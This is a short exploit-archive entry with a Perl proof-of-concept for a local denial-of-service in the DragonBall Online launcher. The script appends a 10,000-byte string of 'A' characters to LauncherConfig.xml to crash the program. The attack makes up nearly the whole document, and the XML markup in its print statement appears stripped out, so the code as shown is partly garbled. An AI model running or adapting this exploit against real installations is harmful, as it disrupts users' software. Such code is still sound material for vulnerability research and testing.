# Exploit Title: DBO local DOS Exploit (LauncherConfig.xml) # Date: 12/09/2011 # Author: AlpHaNiX # Contact: Alpha_[at]_hacker_[dot]_bz # Version: all # Tested on: win7 # File Path: []:\Netmarble\DragonBall Online $junk = "A" x 10000; open(file,">>LauncherConfig.xml"); print file "\n". "\n". "".$junk."\n". "\n". "\n". ""; close(file);